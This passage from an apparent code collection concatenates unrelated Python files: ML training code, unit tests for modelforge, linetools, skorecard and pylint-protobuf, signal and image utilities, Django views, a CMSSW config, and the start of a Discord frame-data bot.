sample_train_eval=10000, stratify=args.stratify, filtered_bias=filtered_bias)
dim = 100
recurrent_layer = CudnnLSTMRecurrentDropout(dim, 0.0)
model = TextPairQaDebiasingModel(
None, # Assume pre-tokenized data
text_encoder=WordAndCharEncoder(
"glove.6B.50d" if dbg else "crawl-300d-2M",
first_n=None,
char_embed_dim=24,
character_mapper=Conv1d(100, 5, None),
character_pooler=MaxPooler(),
word_length=30
),
map_embed=seq(
VariationalDropout(0.2),
recurrent_layer,
VariationalDropout(0.2)
),
fuse_layer=BiAttention(WeightedDot()),
post_process_layer=seq(
FullyConnected(dim * 2, activation="glu"),
VariationalDropout(0.2),
recurrent_layer,
VariationalDropout(0.2),
recurrent_layer,
VariationalDropout(0.2),
),
debias_loss_fn=cli_utils.get_qa_loss_fn(args)
)
with open(__file__) as f:
notes = f.read()
py_utils.add_stdout_logger()
trainer.train(dataset, model, args.output_dir, notes)
if args.output_dir:
logging.info("Evaluating")
compute_all_scores(args.output_dir, ["dev", "add_sent", "add_one_sent"])
if __name__ == '__main__':
main()
|
500500
|
import os
import shutil
from tempfile import gettempdir
import unittest
import modelforge.index as index
from modelforge.tests import fake_dulwich as fake_git
class GitIndexTests(unittest.TestCase):
tempdir = gettempdir()
cached_path = os.path.join(tempdir, "modelforge-test-cache")
repo_path = os.path.join(cached_path, "src-d", "models")
default_url = "https://github.com/src-d/models"
templates_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "templates"))
default_index = {
"models": {
"docfreq": {
"12345678-9abc-def0-1234-56789abcdef0": {
"url": "https://xxx",
"created_at": "13:00",
"code": "model_code %s",
"description": "model_description"},
"1e3da42a-28b6-4b33-94a2-a5671f4102f4": {
"url": "https://xxx",
"created_at": "13:00",
"code": "%s",
"description": ""
}}},
"meta": {
"docfreq": {
"code": "readme_code %s",
"description": "readme_description",
"default": "12345678-9abc-def0-1234-56789abcdef0"}
}}
def clear(self):
if os.path.exists(self.cached_path):
shutil.rmtree(os.path.expanduser(self.cached_path))
def setUp(self):
index.git = fake_git
index.Repo = fake_git.FakeRepo
fake_git.FakeRepo.reset(self.default_index)
def tearDown(self):
self.clear()
from dulwich.repo import Repo
index.Repo = Repo
from dulwich import porcelain as git
index.git = git
def test_init_base(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
self.assertEqual(git_index.remote_url, "https://github.com/src-d/models")
self.assertEqual(git_index.repo, "src-d/models")
self.assertEqual(git_index.cached_repo, self.repo_path)
self.assertTrue(os.path.exists(os.path.join(
self.repo_path, "index.json")))
self.assertTrue(os.path.exists(os.path.join(
self.repo_path, "docfreq")))
self.assertListEqual(sorted(os.listdir(os.path.join(
self.repo_path, "docfreq"))),
["12345678-9abc-def0-1234-56789abcdef0.md",
"1e3da42a-28b6-4b33-94a2-a5671f4102f4.md"])
self.assertEqual(git_index.contents, self.default_index)
self.assertEqual(git_index.models, self.default_index["models"])
self.assertEqual(git_index.meta, self.default_index["meta"])
self.assertTrue(git_index.signoff)
def test_init_fetch(self):
index.GitIndex(remote=self.default_url, cache=self.cached_path)
self.assertTrue(fake_git.FakeRepo.checkout)
self.assertTrue(fake_git.FakeRepo.cloned)
fake_git.FakeRepo.reset(self.default_index)
index.GitIndex(remote=self.default_url, cache=self.cached_path)
self.assertFalse(fake_git.FakeRepo.cloned)
self.assertFalse(fake_git.FakeRepo.pulled)
fake_git.FakeRepo.reset(self.default_index, head="1")
index.GitIndex(remote=self.default_url, cache=self.cached_path)
self.assertFalse(fake_git.FakeRepo.cloned)
self.assertTrue(fake_git.FakeRepo.pulled)
def test_init_errors(self):
with self.assertRaises(ValueError):
index.GitIndex(remote="no_protocol", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="badprotocol://github.com", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http:///nodomain", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://nopath.com", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://github.com/not-git-repo", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://github.com/bad-ssh", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://github.com/bad-credentials", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote=self.default_url, username="no-password",
cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote=self.default_url, password="<PASSWORD>",
cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://github.com/no-index", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://github.com/json", cache=self.cached_path)
def test_init_variants(self):
git_index = index.GitIndex(
remote="http://github.com/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "http://github.com/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="git://github.com/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "git://github.com/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="ssh://[email protected]/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "ssh://[email protected]/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="git+ssh://[email protected]/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "git+ssh://[email protected]/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote=self.default_url, username="user", password="password",
cache=self.cached_path)
self.assertEqual(git_index.remote_url, "https://user:[email protected]/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="https://notgithub.com/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "https://notgithub.com/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="https://github.com/not/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "https://github.com/not/src-d/models")
self.assertEqual(git_index.repo, "not/src-d/models")
self.assertEqual(git_index.cached_repo,
os.path.join(self.cached_path, "not", "src-d", "models"))
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="https://github.com/src-d.git/models.git", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "https://github.com/src-d.git/models.git")
self.assertEqual(git_index.repo, "src-d.git/models")
self.assertEqual(git_index.cached_repo,
os.path.join(self.cached_path, "src-d.git/models"))
self.clear()
fake_git.FakeRepo.reset(self.default_index)
cached_path = os.path.join(self.cached_path, "cache")
git_index = index.GitIndex(remote="https://github.com/src-d/models", cache=cached_path)
self.assertEqual(git_index.repo, "src-d/models")
self.assertEqual(git_index.cached_repo,
os.path.join(self.cached_path, "cache", "src-d", "models"))
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path, signoff=True)
self.assertTrue(git_index.signoff)
def test_remove(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
with self.assertRaises(ValueError):
git_index.remove_model("fake_uuid")
git_index.remove_model("1e3da42a-28b6-4b33-94a2-a5671f4102f4")
self.assertNotIn("1e3da42a-28b6-4b33-94a2-a5671f4102f4",
git_index.models["docfreq"])
self.assertIn("12345678-9abc-def0-1234-56789abcdef0", git_index.models["docfreq"])
self.assertEqual(git_index.meta["docfreq"]["default"],
"12345678-9abc-def0-1234-56789abcdef0")
self.assertFalse(os.path.exists(os.path.join(
self.repo_path, "docfreq", "1e3da42a-28b6-4b33-94a2-a5671f4102f4.md")))
self.assertTrue(os.path.exists(os.path.join(
self.repo_path, "docfreq", "12345678-9abc-def0-1234-56789abcdef0.md")))
git_index.remove_model("12345678-9abc-def0-1234-56789abcdef0")
self.assertNotIn("docfreq", git_index.models)
self.assertNotIn("docfreq", git_index.meta)
self.assertFalse(os.path.exists(os.path.join(
self.repo_path, "docfreq", "12345678-9abc-def0-1234-56789abcdef0")))
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
git_index.remove_model("12345678-9abc-def0-1234-56789abcdef0")
self.assertTrue(os.path.exists(os.path.join(
self.repo_path, "docfreq", "1e3da42a-28b6-4b33-94a2-a5671f4102f4.md")))
self.assertFalse(os.path.exists(os.path.join(
self.repo_path, "docfreq", "12345678-9abc-def0-1234-56789abcdef0.md")))
self.assertIn("1e3da42a-28b6-4b33-94a2-a5671f4102f4", git_index.models["docfreq"])
self.assertNotIn("12345678-9abc-def0-1234-56789abcdef0", git_index.models["docfreq"])
self.assertEqual(git_index.meta["docfreq"]["default"], "")
def test_add(self):
template_path = os.path.join(self.templates_dir, "model.md.jinja2")
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
template = git_index.load_template(template_path)
meta = {
"default": {"default": "92609e70-f79c-46b5-8419-55726e873cfc",
"code": "readme_code %s", "description": "readme_description"},
"model": {
"code": "model_code %s",
"description": "model_description",
"size": "4 Bytes",
"references": [["ref_name", "ref_url"]],
"extra": {"ext": "data"},
"license": "Proprietary",
"dependencies": [],
"url": "http://xxx",
"created_at": "13:42",
"version": [1, 0, 3]
}
}
git_index.add_model("docfreq", "92609e70-f79c-46b5-8419-55726e873cfc", meta, template)
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
meta["model"]["license"] = "ODbL-1.0"
git_index.add_model("docfreq", "92609e70-f79c-46b5-8419-55726e873cfc", meta, template)
self.assertEqual(git_index.models["docfreq"]["92609e70-f79c-46b5-8419-55726e873cfc"],
meta["model"])
self.assertNotEqual(git_index.meta["docfreq"]["default"],
"92609e70-f79c-46b5-8419-55726e873cfc")
model_path = os.path.join(
self.repo_path, "docfreq", "92609e70-f79c-46b5-8419-55726e873cfc.md")
self.assertTrue(os.path.exists(model_path))
with open(model_path) as _in:
model = _in.read()
with open(os.path.join(os.path.dirname(__file__), "model.md")) as _in:
real_model = _in.read()
self.assertEqual(model, real_model)
git_index.add_model("docfreq", "92609e70-f79c-46b5-8419-55726e873cfc", meta, template,
update_default=True)
self.assertDictEqual(git_index.meta["docfreq"], meta["default"])
git_index.add_model("other", "92609e70-f79c-46b5-8419-55726e873cfc", meta, template)
self.assertEqual(git_index.models["other"]["92609e70-f79c-46b5-8419-55726e873cfc"],
meta["model"])
self.assertDictEqual(git_index.meta["other"], meta["default"])
self.assertTrue(os.path.exists(os.path.join(
self.repo_path, "other", "92609e70-f79c-46b5-8419-55726e873cfc.md")))
self.assertDictEqual(git_index.meta["other"], meta["default"])
def test_readme(self):
self.maxDiff = None
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
template_path = os.path.join(self.templates_dir, "readme.md.jinja2")
template = git_index.load_template(template_path)
git_index.update_readme(template)
readme_path = os.path.join(self.cached_path, "src-d/models/README.md")
self.assertTrue(os.path.exists(readme_path))
with open(readme_path) as _in:
readme = _in.read()
with open(os.path.join(os.path.dirname(__file__), "readme.md")) as _in:
real_readme = _in.read()
self.assertEqual(readme, real_readme)
def test_initialize(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
with open(os.path.join(git_index.cached_repo, ".gitignore"), "w") as _out:
_out.write("nothing")
git_index.reset()
empty_index = {"models": {}, "meta": {}}
self.assertDictEqual(empty_index, git_index.contents)
self.assertTrue(os.path.exists(git_index.cached_repo))
self.assertListEqual(sorted(os.listdir(git_index.cached_repo)), [".gitignore", "docfreq"])
def test_upload_add(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
git_index.upload("add", {"model": "a", "uuid": "b"})
self.assertTrue(fake_git.FakeRepo.added)
self.assertIn("Add a/b\n\nSigned-off-by:", fake_git.FakeRepo.message)
self.assertTrue(fake_git.FakeRepo.pushed)
def test_upload_delete(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
git_index.upload("delete", {"model": "a", "uuid": "b"})
self.assertTrue(fake_git.FakeRepo.added)
self.assertIn("Delete a/b\n\nSigned-off-by:", fake_git.FakeRepo.message)
self.assertTrue(fake_git.FakeRepo.pushed)
def test_upload_init(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
git_index.upload("reset", {})
self.assertTrue(fake_git.FakeRepo.added)
self.assertIn("Initialize a new Modelforge index\n\nSigned-off-by:",
fake_git.FakeRepo.message)
self.assertTrue(fake_git.FakeRepo.pushed)
def test_upload_bug(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
fake_git.FakeRepo.reset(self.default_index, head="1")
with self.assertRaises(ValueError):
git_index.upload("reset", {})
def test_template(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
with self.assertRaises(ValueError):
git_index.load_template("fake.jinj4")
with self.assertRaises(ValueError):
git_index.load_template("fake.jinja2")
template_path = os.path.join(self.templates_dir, "readme.md.jinja2")
template = git_index.load_template(template_path)
self.assertEqual(template.render(meta={}, models={}, links={}),
"source{d} MLonCode models\n=========================\n")
if __name__ == "__main__":
unittest.main()
|
500514
|
from magma import *
from magma.testing import check_files_equal
def test():
class main(Circuit):
name = "main"
io = IO(O=Out(Bits[2]))
wire(array([0,1]), io.O)
compile("build/out2", main, output="verilog")
assert check_files_equal(__file__, "build/out2.v", "gold/out2.v")
|
500551
|
import os
from pprint import pprint
from environs import Env, EnvValidationError
from marshmallow.validate import OneOf, Email, Length, Range
os.environ["TTL"] = "-2"
os.environ["NODE_ENV"] = "invalid"
os.environ["EMAIL"] = "^_^"
env = Env(eager=False)
TTL = env.int("TTL", validate=Range(min=0, max=100))
NODE_ENV = env.str(
"NODE_ENV", validate=OneOf(["production", "development"], error="NODE_ENV must be one of: {choices}")
)
EMAIL = env.str("EMAIL", validate=[Length(min=4), Email()])
# This will raise an error with the combined validation messages
try:
env.seal()
except EnvValidationError as error:
pprint(error.error_messages)
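# error_messages is expected (per environs' deferred-validation behaviour) to be a dict mapping
# each variable name -- here "TTL", "NODE_ENV" and "EMAIL" -- to its list of validation errors.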
|
500556
|
import numpy as np
import torch
import albumentations as A
__all__ = ["SigmoidNormalization", "channel_name_to_mean_std", "CubicRootNormalization"]
channel_name_to_mean_std = {
"vv": (0, 50),
"vh": (0, 50),
"bathymetry": (
0,
1000.0,
),
"wind_speed": (6.81594445, 1.62833557),
}
# VH_dB (array([-26.29277562]), array([4.96274162]))
# VV_dB (array([-16.42577586]), array([4.79392252]))
# bathymetry (array([-1027.55193048]), array([1223.22965922]))
# owiMask (array([0.21731419]), array([0.53000913]))
# owiWindDirection (array([194.57592277]), array([52.55040799]))
# owiWindQuality (array([1.56499957]), array([0.64571367]))
# owiWindSpeed (array([6.81594445]), array([1.62833557]))
class CubicRootNormalization(A.ImageOnlyTransform):
def __init__(self):
super().__init__(always_apply=True)
def apply(self, img, **params) -> np.ndarray:
return np.cbrt(img)
def get_transform_init_args(self):
return tuple()
class SigmoidNormalization(A.ImageOnlyTransform):
def __init__(self, midpoint=-20, temperature=0.18):
super().__init__(always_apply=True)
self.midpoint = midpoint
self.temperature = temperature
def apply(self, img, **params):
x = torch.from_numpy(img)
xs = (x - self.midpoint) * self.temperature
return xs.sigmoid().numpy()
def get_transform_init_args_names(self):
return ("midpoint", "temperature")
|
500593
|
import numpy as np
def get_kaiserWindow(kHW):
kaiserWindow = np.zeros(kHW * kHW)
if kHW == 8:
kaiserWindow[0 + kHW * 0] = 0.1924
kaiserWindow[0 + kHW * 1] = 0.2989
kaiserWindow[0 + kHW * 2] = 0.3846
kaiserWindow[0 + kHW * 3] = 0.4325
kaiserWindow[1 + kHW * 0] = 0.2989
kaiserWindow[1 + kHW * 1] = 0.4642
kaiserWindow[1 + kHW * 2] = 0.5974
kaiserWindow[1 + kHW * 3] = 0.6717
kaiserWindow[2 + kHW * 0] = 0.3846
kaiserWindow[2 + kHW * 1] = 0.5974
kaiserWindow[2 + kHW * 2] = 0.7688
kaiserWindow[2 + kHW * 3] = 0.8644
kaiserWindow[3 + kHW * 0] = 0.4325
kaiserWindow[3 + kHW * 1] = 0.6717
kaiserWindow[3 + kHW * 2] = 0.8644
kaiserWindow[3 + kHW * 3] = 0.9718
for i in range(kHW // 2):
for j in range(kHW // 2, kHW):
kaiserWindow[i + kHW * j] = kaiserWindow[i + kHW * (kHW - j - 1)]
for i in range(kHW // 2, kHW):
for j in range(kHW):
kaiserWindow[i + kHW * j] = kaiserWindow[kHW - i - 1 + kHW * j]
elif kHW == 12:
kaiserWindow[0 + kHW * 0] = 0.1924
kaiserWindow[0 + kHW * 1] = 0.2615
kaiserWindow[0 + kHW * 2] = 0.3251
kaiserWindow[0 + kHW * 3] = 0.3782
kaiserWindow[0 + kHW * 4] = 0.4163
kaiserWindow[0 + kHW * 5] = 0.4362
kaiserWindow[1 + kHW * 0] = 0.2615
kaiserWindow[1 + kHW * 1] = 0.3554
kaiserWindow[1 + kHW * 2] = 0.4419
kaiserWindow[1 + kHW * 3] = 0.5139
kaiserWindow[1 + kHW * 4] = 0.5657
kaiserWindow[1 + kHW * 5] = 0.5927
kaiserWindow[2 + kHW * 0] = 0.3251
kaiserWindow[2 + kHW * 1] = 0.4419
kaiserWindow[2 + kHW * 2] = 0.5494
kaiserWindow[2 + kHW * 3] = 0.6390
kaiserWindow[2 + kHW * 4] = 0.7033
kaiserWindow[2 + kHW * 5] = 0.7369
kaiserWindow[3 + kHW * 0] = 0.3782
kaiserWindow[3 + kHW * 1] = 0.5139
kaiserWindow[3 + kHW * 2] = 0.6390
kaiserWindow[3 + kHW * 3] = 0.7433
kaiserWindow[3 + kHW * 4] = 0.8181
kaiserWindow[3 + kHW * 5] = 0.8572
kaiserWindow[4 + kHW * 0] = 0.4163
kaiserWindow[4 + kHW * 1] = 0.5657
kaiserWindow[4 + kHW * 2] = 0.7033
kaiserWindow[4 + kHW * 3] = 0.8181
kaiserWindow[4 + kHW * 4] = 0.9005
kaiserWindow[4 + kHW * 5] = 0.9435
kaiserWindow[5 + kHW * 0] = 0.4362
kaiserWindow[5 + kHW * 1] = 0.5927
kaiserWindow[5 + kHW * 2] = 0.7369
kaiserWindow[5 + kHW * 3] = 0.8572
kaiserWindow[5 + kHW * 4] = 0.9435
kaiserWindow[5 + kHW * 5] = 0.9885
for i in range(kHW // 2):
for j in range(kHW // 2, kHW):
kaiserWindow[i + kHW * j] = kaiserWindow[i + kHW * (kHW - j - 1)]
for i in range(kHW // 2, kHW):
for j in range(kHW):
kaiserWindow[i + kHW * j] = kaiserWindow[kHW - i - 1 + kHW * j]
else:
for k in range(kHW * kHW):
kaiserWindow[k] = 1.0
kaiserWindow = kaiserWindow.reshape((kHW, kHW))
return kaiserWindow
def get_kaiserWindow_np(kHW):
k = np.kaiser(kHW, 2)
k_2d = k[:, np.newaxis] @ k[np.newaxis, :]
return k_2d
if __name__ == '__main__':
kaiser = get_kaiserWindow(8)
kaiser_np = get_kaiserWindow_np(8)
diff = np.abs(kaiser-kaiser_np)
print(np.max(diff))
print(np.sum(diff))
|
500611
|
for nname, net in ctx.nets:
ctx.lockNetRouting(nname)
ctx.cells["slice_i"].addInput("A0")
ctx.connectPort("ctr[26]", "slice_i", "A0")
ctx.cells["slice_i"].setParam("LUT0_INITVAL", "0101010101010101") # LED is active low so invert
ctx.cells["slice_i"].setParam("A0MUX", "A0") # remove constant mux on LUT input
|
500623
|
import json
from editor.views.generic import user_json, stamp_json, comment_json
from editor.models import TimelineItem
from django.views import generic
from django import http
from django.urls import reverse
event_json_views = {
'stamp': stamp_json,
'comment': comment_json,
}
def event_json(event, viewed_by):
date = event.date.strftime('%Y-%m-%d %H:%M:%S')
user = user_json(event.user)
if event.type not in event_json_views:
raise Exception("Unrecognised event type %s" % event.type)
data = event_json_views[event.type](event.data, viewed_by=viewed_by)
return {
'date': date,
'type': event.type,
'data': data,
'user': user,
}
def timeline_json(events, viewed_by):
return [event_json(event, viewed_by) for event in events]
class DeleteTimelineItemView(generic.DeleteView):
model = TimelineItem
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
if self.object.can_be_deleted_by(self.request.user):
self.object.delete()
return http.HttpResponse('timeline item {} deleted'.format(self.object.pk))
else:
return http.HttpResponseForbidden('You don\'t have the necessary access rights.')
class HideTimelineItemView(generic.UpdateView):
model = TimelineItem
def post(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.hidden_by.add(self.request.user)
data = {
'success': True,
'undo': reverse('timelineitem_unhide', args=(self.object.pk,))
}
return http.HttpResponse(json.dumps(data), content_type='application/json')
class UnhideTimelineItemView(generic.UpdateView):
model = TimelineItem
def post(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.hidden_by.remove(self.request.user)
data = {
'success': True,
}
return http.HttpResponse(json.dumps(data), content_type='application/json')
|
500625
|
import maya.mel as mm
def evalMelString(pyString):
return mm.eval(pyString)
def convertStringsToMelArray(pyStrings):
return str([str(x) for x in pyStrings]).replace("'","\"").replace("[","{").replace("]", "}")
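# Illustrative example (names are hypothetical): convertStringsToMelArray(["pSphere1", "pCube1"])
# returns the MEL-style array literal '{"pSphere1", "pCube1"}'.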
|
500653
|
from __future__ import print_function, absolute_import, division, unicode_literals
import numpy as np
import pytest
import pdb
from astropy import units as u
from astropy import constants as const
from linetools.spectralline import AbsLine
from linetools.analysis import voigt as lav
c_kms = const.c.to('km/s').value
def test_voigt_model():
from astropy.modeling import fitting
# Wavelength array
wave = np.linspace(3644, 3650, 100)*u.AA
# HI line
abslin = AbsLine(1215.670*u.AA, z=2.)
abslin.attrib['N'] = 10**14./u.cm**2
abslin.attrib['b'] = 25.*u.km/u.s
# Voigt
vmodel = abslin.generate_voigt(wave=wave)
vmodel.sig = 0.1
# Voigt fit
abslin.analy['spec'] = vmodel
abslin.limits.set([-100.,100]*u.km/u.s)
abslin.measure_aodm(normalize=False) # Sets analysis pixels
fitvoigt = lav.single_voigt_model(logN=np.log10(abslin.attrib['N'].value),
b=abslin.attrib['b'].value, z=2., wrest=abslin.wrest.value,
gamma=abslin.data['gamma'].value,
f=abslin.data['f'], fwhm=3.)
# Restrict parameter space
fitvoigt.logN.min = 12.
fitvoigt.b.min = 10.
fitvoigt.z.min = 2. + -100. * (1 + 2.) / c_kms
fitvoigt.z.max = 2. + 100 * (1 + 2.) / c_kms
# Fit
fitter = fitting.LevMarLSQFitter()
parm = fitter(fitvoigt,vmodel.wavelength[abslin.analy['pix']].value,
vmodel.flux[abslin.analy['pix']].value)
assert np.abs(parm.logN.value-np.log10(abslin.attrib['N'].value)) < 0.1
def test_voigt_sngl_line():
# Wavelength array
wave = np.linspace(3644, 3650, 100)*u.AA
imn = np.argmin(np.abs(wave.value-3647))
# HI line
abslin = AbsLine(1215.670*u.AA, z=2.)
abslin.attrib['N'] = 10**14./u.cm**2
abslin.attrib['b'] = 25.*u.km/u.s
# Voigt
vmodel = abslin.generate_voigt(wave=wave)
np.testing.assert_allclose(vmodel.flux[imn].value,0.05145500775919881)
def test_voigt_multi_line():
# Wavelength array
wave = np.linspace(3644, 3650, 100)*u.AA
imn = np.argmin(np.abs(wave.value-3646.2))
# HI line
abslin = AbsLine(1215.670*u.AA, z=2.)
abslin.attrib['N'] = 10**17.5/u.cm**2
abslin.attrib['b'] = 20.*u.km/u.s
# DI line
abslin2 = AbsLine('DI 1215', z=2.)
abslin2.attrib['N'] = 10**13./u.cm**2
abslin2.attrib['b'] = 15.*u.km/u.s
# Voigt
vmodel3 = lav.voigt_from_abslines(wave,[abslin,abslin2])
np.testing.assert_allclose(vmodel3.flux[imn].value,0.5715512949324375)
def test_voigt_fail():
#
wave = np.linspace(3644, 3650, 100)
pytest.raises(ValueError, lav.voigt_from_abslines, wave, [None, None])
#
wave = np.linspace(3644, 3650, 100)*u.AA
pytest.raises(IOError, lav.voigt_from_abslines, wave, [None, None],
skip_wveval=True)
def test_voigt_sngl_tau():
# Wavelength array
wave = np.linspace(3644, 3650, 100)*u.AA
imn = np.argmin(np.abs(wave.value-3647))
# HI line
abslin = AbsLine(1215.670*u.AA, z=2.)
abslin.attrib['N'] = 10**14./u.cm**2
abslin.attrib['b'] = 25.*u.km/u.s
# Tau
tau = lav.voigt_from_abslines(wave,abslin,ret='tau')
assert not np.any(tau<0)
np.testing.assert_allclose(tau[imn], 2.9681283001576779)
def test_voigt_king():
vin = np.linspace(0., 1., num=1000)
a = 0.1
voigt = lav.voigtking(vin, a)
# Test
np.testing.assert_allclose(voigt[50], 0.89440482758173867)
def test_voigt_from_components():
from linetools.isgm.tests.test_use_abscomp import mk_comp
wv_array = np.arange(900, 1250, 0.01) * u.AA
comp1, HIlines = mk_comp('HI', zcomp=0.01, vlim=[-10,10]*u.km/u.s)
comp2, HIlines = mk_comp('HI', zcomp=0.05, vlim=[-10,10]*u.km/u.s)
model = lav.voigt_from_components(wv_array, [comp1,comp2])
|
500671
|
import FWCore.ParameterSet.Config as cms
from Configuration.EventContent.EventContent_cff import *
# in case we want only the tagInfos and nothing more:
# (this means we need the jets for pt, eta and the JTA for being able
# to find the jet ref from the tag info)
BTAGCALAbtagCalibEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep *_mcAlgoJetFlavour_*_*',
'keep *_mcPhysJetFlavour_*_*',
'keep *_iterativeCone5CaloJets_*_*',
'keep *_jetTracksAssociator_*_*',
'keep *_impactParameterTagInfos_*_*',
'keep *_combinedSVTagInfos_*_*')
)
# in case we want to be able to compute the TagInfos ourselves
# (basically we need tracks and primary vertices for that)
BTAGCALBbtagCalibEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep *_mcAlgoJetFlavour_*_*',
'keep *_mcPhysJetFlavour_*_*',
'keep *_iterativeCone5CaloJets_*_*',
'keep *_ctfWithMaterialTracks_*_*',
'keep *_offlinePrimaryVerticesFromCTFTracks_*_*')
)
btagCalibEventSelection = cms.PSet(
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('btagCalibPath')
)
)
|
500681
|
import numpy as np
from skorecard.bucketers import AsIsCategoricalBucketer
def test_correct_output(df):
"""Test that correct use of CatBucketTransformer returns expected results."""
X = df
y = df["default"].values
asb = AsIsCategoricalBucketer(variables=["EDUCATION"])
asb.fit(X, y)
X_trans = asb.transform(X)
assert len(X["EDUCATION"].unique()) == len(X_trans["EDUCATION"].unique())
def test_specials(df):
"""Test specials get assigned to the right bin."""
X = df[["EDUCATION"]]
y = df["default"]
asb = AsIsCategoricalBucketer(variables=["EDUCATION"], specials={"EDUCATION": {"ed 0": [1]}})
asb.fit(X, y)
X_transform = asb.transform(X)
# Make sure value 1 is assigned special bucket
assert np.unique(X_transform[X["EDUCATION"] == 1].values)[0] == -3
def test_missing_default(df_with_missings) -> None:
"""Test that missing values are assigned to the right bucket."""
X = df_with_missings
y = df_with_missings["default"].values
bucketer = AsIsCategoricalBucketer(variables=["EDUCATION"])
X["EDUCATION_trans"] = bucketer.fit_transform(X[["EDUCATION"]], y)
assert len(X["EDUCATION_trans"].unique()) == 8 # 7 unique values + 1 for NAs
|
500687
|
import pytest
import pylint_protobuf
@pytest.fixture
def motorcycle_mod(proto_builder):
preamble = """
syntax = "proto3";
package bikes;
"""
return proto_builder("""
message Engine {
int32 displacement = 2;
}
message Motorcycle {
string brand = 1;
string name = 2;
Engine engine = 3;
}
""", 'motorcycles_pb2', preamble=preamble)
@pytest.fixture
def issue26_mod(motorcycle_mod, module_builder):
return module_builder("""
from {} import Motorcycle
def get_motorcycle() -> Motorcycle:
return Motorcycle()
def something():
m = get_motorcycle()
engine = m.engine
should_warn = m.should_warn
""".format(motorcycle_mod), 'issue26_mod')
EXPECTED_MSGS = [
pylint_protobuf.MESSAGES['E5901'][0] % ('should_warn', 'Motorcycle'),
# "Instance of 'Motorcycle' has no 'should_warn' member", # no E1101
]
def test_no_E1101_on_returned_values(issue26_mod, linter_factory):
linter = linter_factory(
register=pylint_protobuf.register,
disable=['all'], enable=['protobuf-undefined-attribute', 'no-member'],
)
linter.check([issue26_mod])
actual_msgs = [message.msg for message in linter.reporter.messages]
assert sorted(EXPECTED_MSGS) == sorted(actual_msgs)
|
500699
|
import discord
import asyncio
import logging
from discord.ext import commands
# self-created modules below
import lib.embedCreation as embedCreation #contains functions for creating an embed
import lib.tekkenFinder as tekkenFinder #contains functions for finding character and move details
# Get token from local dir text file
tokenFile = open("token.txt", 'r')
token = tokenFile.read()
tokenFile.close()
description = 'A Tekken 7 Frame Data Bot made by Hann.'
prefix = '.'
discord_logger = logging.getLogger('discord')
discord_logger.setLevel(logging.CRITICAL)
log = logging.getLogger()
log.setLevel(logging.INFO)
handler = logging.FileHandler(filename='combot.log', encoding='utf-8', mode='w')
log.addHandler(handler)
bot = commands.Bot(command_prefix=prefix, description=description)
combot_gagged_channels_File = open("lib/gagged_channels.txt", 'r')
combot_gagged_channels = combot_gagged_channels_File.read().splitlines()
combot_gagged_channels_File.close()
# TODO: YOU LEFT OFF HERE
# TODO: MAYBE NEXT TIME FAM
# file = open('bot_settings.json', 'r+')
# content = file.read()
# file.close()
# stuff = content.loads(content)
@bot.event
async def on_ready():
# Display Login Status in Console
print('<---------------------------->')
print('Logged in as')
print(bot.user.name)
print(bot.user.id)
print('<---------------------------->')
while True:
await bot.change_presence(game=discord.Game(name='DAH'))
await asyncio.sleep(30)
await bot.change_presence(game=discord.Game(name='.help'))
await asyncio.sleep(120)
await bot.change_presence(game=discord.Game(name='<NAME>'))
await asyncio.sleep(30)
await bot.change_presence(game=discord.Game(name='TEKKEN 7'))
await asyncio.sleep(30)
@bot.event
async def on_message(message):
# check if message author is a bot
if message.author.bot:
# check if sent by self
if message.author.id == bot.user.id:
await bot_message_cleanup(message)
return
if await is_Gagged(message):
return
if message.content.startswith('!'):
if message.content.startswith('!!'):
